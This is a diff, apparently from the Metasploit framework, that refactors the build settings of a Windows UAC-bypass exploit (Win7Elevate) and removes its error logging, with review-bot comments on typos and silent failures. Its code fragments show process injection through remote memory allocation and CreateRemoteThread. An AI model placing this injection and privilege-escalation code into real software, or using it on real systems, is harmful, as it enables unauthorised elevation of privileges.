{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
|
|
||||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.ActiveCfg = Debug|Win32
|
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.Build.0 = Debug|Win32
|
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.Build.0 = Debug|Win32
|
||||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|x64.ActiveCfg = Debug|x64
|
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|x64.ActiveCfg = Debug|x64
|
||||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
|
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|x64.Build.0 = Debug|x64
|
||||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.ActiveCfg = Release|Win32
|
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.ActiveCfg = Release|Win32
|
||||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.Build.0 = Release|Win32
|
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.Build.0 = Release|Win32
|
||||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.ActiveCfg = Release|x64
|
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.ActiveCfg = Release|x64
|
||||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.Build.0 = Release|x64
|
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.Build.0 = Release|x64
|
||||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
|
|
||||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.ActiveCfg = Debug|Win32
|
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.Build.0 = Debug|Win32
|
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.Build.0 = Debug|Win32
|
||||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|x64.ActiveCfg = Debug|x64
|
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|x64.ActiveCfg = Debug|x64
|
||||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
|
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|x64.Build.0 = Debug|x64
|
||||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.ActiveCfg = Release|Win32
|
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.ActiveCfg = Release|Win32
|
||||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.Build.0 = Release|Win32
|
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.Build.0 = Release|Win32
|
||||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.ActiveCfg = Release|x64
|
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.ActiveCfg = Release|x64
|
||||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.Build.0 = Release|x64
|
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.Build.0 = Release|x64
|
||||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
|
|
||||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.ActiveCfg = Debug|Win32
|
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.Build.0 = Debug|Win32
|
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.Build.0 = Debug|Win32
|
||||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|x64.ActiveCfg = Debug|x64
|
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|x64.ActiveCfg = Debug|x64
|
||||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
|
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|x64.Build.0 = Debug|x64
|
||||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.ActiveCfg = Release|Win32
|
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.ActiveCfg = Release|Win32
|
||||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.Build.0 = Release|Win32
|
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.Build.0 = Release|Win32
|
||||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|x64.ActiveCfg = Release|x64
|
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|x64.ActiveCfg = Release|x64
|
||||||
|
|
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate.cpp
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate.rc
|
@ -61,22 +61,23 @@ END
|
||||||
|
|
||||||
#ifdef _DEBUG
|
#ifdef _DEBUG
|
||||||
|
|
||||||
|
// Z:\code\metasploit-framework\external\source\exploits\bypassuac\TIOR\Debug\Win32
|
||||||
#ifdef _WIN64
|
#ifdef _WIN64
|
||||||
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\x64\\Debug\\Win7ElevateDll64.dll"
|
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win7ElevateDll\\\Debug\\x64\\Win7ElevateDll.x64.dll"
|
||||||
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\x64\\Debug\\TIOR64.exe"
|
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\TIOR\\Debug\\x64\\TIOR.x64.exe"
|
||||||
#else
|
#else
|
||||||
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win32\\Debug\\Win7ElevateDll32.dll"
|
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win7ElevateDll\\\Debug\\Win32\\Win7ElevateDll.x86.dll"
|
||||||
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\Win32\\Debug\\TIOR32.exe"
|
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\TIOR\\Debug\\Win32\\TIOR.x86.exe"
|
||||||
#endif
|
#endif
|
||||||
|
|
||||||
#else // _DEBUG
|
#else // _DEBUG
|
||||||
|
|
||||||
#ifdef _WIN64
|
#ifdef _WIN64
|
||||||
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\x64\\Release\\Win7ElevateDll64.dll"
|
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win7ElevateDll\\\Release\\x64\\Win7ElevateDll.x64.dll"
|
||||||
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\x64\\Release\\TIOR64.exe"
|
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\TIOR\\Release\\x64\\TIOR.x64.exe"
|
||||||
#else
|
#else
|
||||||
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win32\\Release\\Win7ElevateDll32.dll"
|
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win7ElevateDll\\\Release\\Win32\\Win7ElevateDll.x86.dll"
|
||||||
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\Win32\\Release\\TIOR32.exe"
|
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\TIOR\\Release\\Win32\\TIOR.x86.exe"
|
||||||
#endif
|
#endif
|
||||||
|
|
||||||
#endif
|
#endif
|
||||||
|
|
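Review bot: The four new `IDD_EMBEDDED_DLL` paths carry a triple backslash (`\\Win7ElevateDll\\\Debug\\` and `\\Win7ElevateDll\\\Release\\`) while the matching `IDD_EMBEDDED_TIOR` lines use the two-backslash form `\\Debug\\` / `\\Release\\`; how rc.exe treats the stray `\D` / `\R` sequence is toolchain-dependent, so the extra backslash should be dropped in all four lines so that they resolve the same way the TIOR lines do. The added comment `// Z:\code\metasploit-framework\...\TIOR\Debug\Win32` is a developer's absolute workstation path, names a Win32 directory directly above the `_WIN64` branch, and documents nothing about the resource table; it should be removed before merge.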
@ -1,5 +1,5 @@
|
||||||
<?xml version="1.0" encoding="utf-8"?>
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
<ItemGroup Label="ProjectConfigurations">
|
<ItemGroup Label="ProjectConfigurations">
|
||||||
<ProjectConfiguration Include="Debug|Win32">
|
<ProjectConfiguration Include="Debug|Win32">
|
||||||
<Configuration>Debug</Configuration>
|
<Configuration>Debug</Configuration>
|
||||||
|
@ -28,23 +28,27 @@
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||||
<ImportGroup Label="ExtensionSettings">
|
<ImportGroup Label="ExtensionSettings">
|
||||||
|
@ -63,25 +67,30 @@
|
||||||
</ImportGroup>
|
</ImportGroup>
|
||||||
<PropertyGroup Label="UserMacros" />
|
<PropertyGroup Label="UserMacros" />
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
<LinkIncremental>true</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)32</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
<LinkIncremental>true</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)64</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
<LinkIncremental>false</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)32</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
<GenerateManifest>false</GenerateManifest>
|
<GenerateManifest>false</GenerateManifest>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
<LinkIncremental>false</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)64</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
|
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -96,10 +105,12 @@
|
||||||
<FunctionLevelLinking>false</FunctionLevelLinking>
|
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||||
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||||
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
|
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Console</SubSystem>
|
<SubSystem>Console</SubSystem>
|
||||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
|
<LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
|
||||||
</Link>
|
</Link>
|
||||||
<BuildLog>
|
<BuildLog>
|
||||||
<Path>
|
<Path>
|
||||||
|
@ -119,10 +130,12 @@
|
||||||
<FunctionLevelLinking>false</FunctionLevelLinking>
|
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||||
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||||
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
|
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Console</SubSystem>
|
<SubSystem>Console</SubSystem>
|
||||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
|
<LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
|
||||||
</Link>
|
</Link>
|
||||||
<BuildLog>
|
<BuildLog>
|
||||||
<Path>
|
<Path>
|
||||||
|
@ -141,12 +154,14 @@
|
||||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Console</SubSystem>
|
<SubSystem>Console</SubSystem>
|
||||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||||
<OptimizeReferences>true</OptimizeReferences>
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
|
<LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
|
||||||
</Link>
|
</Link>
|
||||||
<BuildLog>
|
<BuildLog>
|
||||||
<Path>
|
<Path>
|
||||||
|
@ -155,6 +170,9 @@
|
||||||
<ResourceCompile>
|
<ResourceCompile>
|
||||||
<PreprocessorDefinitions>WIN32;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN32;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
</ResourceCompile>
|
</ResourceCompile>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\..\..\..\data\post\bypassuac-$(PlatformTarget).exe"</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -168,12 +186,14 @@
|
||||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Console</SubSystem>
|
<SubSystem>Console</SubSystem>
|
||||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||||
<OptimizeReferences>true</OptimizeReferences>
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
|
<LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
|
||||||
</Link>
|
</Link>
|
||||||
<BuildLog>
|
<BuildLog>
|
||||||
<Path>
|
<Path>
|
||||||
|
@ -182,6 +202,9 @@
|
||||||
<ResourceCompile>
|
<ResourceCompile>
|
||||||
<PreprocessorDefinitions>WIN64;_WIN64;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN64;_WIN64;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
</ResourceCompile>
|
</ResourceCompile>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\..\..\..\data\post\bypassuac-$(PlatformTarget).exe"</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemGroup>
|
<ItemGroup>
|
||||||
<ClInclude Include="Resource.h" />
|
<ClInclude Include="Resource.h" />
|
||||||
|
@ -204,7 +227,10 @@
|
||||||
<ClCompile Include="Win7Elevate_Utils.cpp" />
|
<ClCompile Include="Win7Elevate_Utils.cpp" />
|
||||||
</ItemGroup>
|
</ItemGroup>
|
||||||
<ItemGroup>
|
<ItemGroup>
|
||||||
<ResourceCompile Include="Win7Elevate.rc" />
|
<ResourceCompile Include="Win7Elevate.rc">
|
||||||
|
<PreprocessorDefinitions Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">WIN64;_WIN64;_DEBUG;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<PreprocessorDefinitions Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">_DEBUG;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
</ResourceCompile>
|
||||||
</ItemGroup>
|
</ItemGroup>
|
||||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||||
<ImportGroup Label="ExtensionTargets">
|
<ImportGroup Label="ExtensionTargets">
|
||||||
|
|
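--- a/external/source/exploits/bypassuac/Win7Elevate/Win7Elevate_Inject.cpp
+++ b/external/source/exploits/bypassuac/Win7Elevate/Win7Elevate_Inject.cpp
@@ -209,7 +209,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
 if (codeStartAdr >= codeEndAdr)
 {
 //MessageBox(hWnd, L"Unexpected function layout", L"Win7Elevate", MB_OK | MB_ICONWARNING);
-CLogger::LogLine(L"Unexpected function layout");
 return;
 }
 
@@ -220,7 +219,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
 if (dwGMFNRes == 0 || dwGMFNRes >= _countof(szPathToSelf))
 {
 //MessageBox(hWnd, L"Couldn't get path to self", L"Win7Elevate", MB_OK | MB_ICONWARNING);
-CLogger::LogLine(L"Couldn't get path to self");
 return;
 }
 
@@ -231,7 +229,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
 if (S_OK != hr)
 {
 //MessageBox(hWnd, L"SHGetFolderPath failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
-CLogger::LogLine(L"SHGetFolderPath failed");
 return;
 }
 
@@ -240,7 +237,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
 if (hModKernel32 == 0)
 {
 //MessageBox(hWnd, L"Couldn't load kernel32.dll", L"Win7Elevate", MB_OK | MB_ICONWARNING);
-CLogger::LogLine(L"Couldn't load kernel32.dll");
 return;
 }
 
@@ -257,7 +253,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
 || 0 == tfpWaitForSingleObject.f)
 {
 //MessageBox(hWnd, L"Couldn't find API", L"Win7Elevate", MB_OK | MB_ICONWARNING);
-CLogger::LogLine(L"Couldn't find API");
 }
 else
 {
@@ -374,26 +369,11 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
 
 void *pRemoteFunc = reme.AllocAndCopyMemory( RemoteCodeFunc, codeEndAdr - codeStartAdr, true);
 
-if (reme.AnyFailures())
-{
-//MessageBox(hWnd, L"Remote allocation failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
-CLogger::LogLine(L"Remote allocation failed");
-}
-else
+if (!(reme.AnyFailures()))
 {
 HANDLE hRemoteThread = CreateRemoteThread(hTargetProc, NULL, 0, reinterpret_cast< LPTHREAD_START_ROUTINE >( pRemoteFunc ), pRemoteArgs, 0, NULL);
 
-if (hRemoteThread == 0)
-{
-//MessageBox(hWnd, L"Couldn't create remote thread", L"Win7Elevate", MB_OK | MB_ICONWARNING);
-CLogger::LogLine(
-CError::Format(
-GetLastError(),
-L"Couldn't create remote thread",
-L"CreateRemoteThread"));
-
-}
-else
+if (hRemoteThread != 0)
 {
 if ( Redirector )
 Redirector();
@@ -415,7 +395,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
 //else if (IDCANCEL == MessageBox(hWnd, L"Continue waiting for remote thread to complete?", L"Win7Elevate", MB_OKCANCEL | MB_ICONQUESTION))
 else
 {
-CLogger::LogLine(L"Continue waiting for remote thread to complete? : NO");
 // See if it completed before the user asked to stop waiting.
 // Code that wasn't just a proof-of-concept would use a worker thread that could cancel the wait UI.
 if (WAIT_OBJECT_0 == WaitForSingleObject(hRemoteThread, 0))
@@ -442,14 +421,4 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
 
 FreeLibrary(hModKernel32);
 
-if (bThreadWaitFailure)
-{
-//MessageBox(hWnd, L"Error waiting on the remote thread to complete", L"Win7Elevate", MB_OK | MB_ICONWARNING);
-CLogger::LogLine(L"Error waiting on the remote thread to complete");
-}
-else if (bThreadWaitSuccess)
-{
-//MessageBox(hWnd, L"Remote thread completed", L"Win7Elevate", MB_OK | MB_ICONINFORMATION);
-CLogger::LogLine(L"Remote thread completed");
-}
 }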
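Review bot: In the `-374,26 +369,11` hunk the inverted `if (!(reme.AnyFailures()))` and `if (hRemoteThread != 0)` have no else branch, so a failed remote allocation or a null `CreateRemoteThread` result now falls out of the block with no record at all, and the `GetLastError()` value that `CError::Format` used to capture is no longer read anywhere in the hunk. If silent failure is the intent it deserves a comment at the first condition, e.g. `// No error reporting: an allocation or CreateRemoteThread failure falls through silently`. The `-257,7 +253,6` hunk leaves an empty `{ }` then-branch ahead of `else`; inverting that condition or adding `// required kernel32 export not found` would make it read as deliberate. In `-442,14 +421,4` the only visible readers of `bThreadWaitFailure` and `bThreadWaitSuccess` are removed, so if they are still assigned earlier in the function they are now dead stores. AttemptOperation begins before and continues between the hunks shown.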
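--- a/external/source/exploits/bypassuac/Win7Elevate/Win7Elevate_Utils.cpp
+++ b/external/source/exploits/bypassuac/Win7Elevate/Win7Elevate_Utils.cpp
@@ -33,7 +33,6 @@ bool W7EUtils::GetProcessList(HWND hWnd, std::map< DWORD, std::wstring > &mapPro
 if (hSnapshot == INVALID_HANDLE_VALUE)
 {
 //MessageBox(hWnd, L"CreateToolhelp32Snapshot failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
-CLogger::LogLine(L"CreateToolhelp32Snapshot failed");
 }
 else
 {
@@ -61,17 +60,7 @@ bool W7EUtils::GetProcessList(HWND hWnd, std::map< DWORD, std::wstring > &mapPro
 {
 DWORD dwErr = GetLastError();
 
-if (ERROR_NO_MORE_FILES != dwErr)
-{
-//MessageBox(hWnd, L"Process32Next/First failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
-CLogger::LogLine(L"Process32Next/First failed");
-}
-else if (mapProcs.empty())
-{
-//MessageBox(hWnd, L"Process32Next/First returned nothing", L"Win7Elevate", MB_OK | MB_ICONWARNING);
-CLogger::LogLine(L"Process32Next/First returned nothing");
-}
-else
+if ((ERROR_NO_MORE_FILES == dwErr) && !(mapProcs.empty()))
 {
 bResult = true;
 }
@@ -107,7 +96,6 @@ bool W7EUtils::OpenProcessToInject(HWND hWnd, HANDLE *pOutProcHandle, DWORD dwPi
 if (szProcName == NULL)
 {
 //MessageBox(hWnd, L"No process name passed in", L"Win7Elevate", MB_OK | MB_ICONWARNING);
-CLogger::LogLine(L"No process name passed in");
 return false;
 }
 
@@ -140,7 +128,7 @@ bool W7EUtils::OpenProcessToInject(HWND hWnd, HANDLE *pOutProcHandle, DWORD dwPi
 }
 
 //MessageBox(hWnd, strMsg.c_str(), L"Win7Elevate", MB_OK | MB_ICONWARNING);
-CLogger::LogLine(strMsg);
+
 
 return false;
 }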
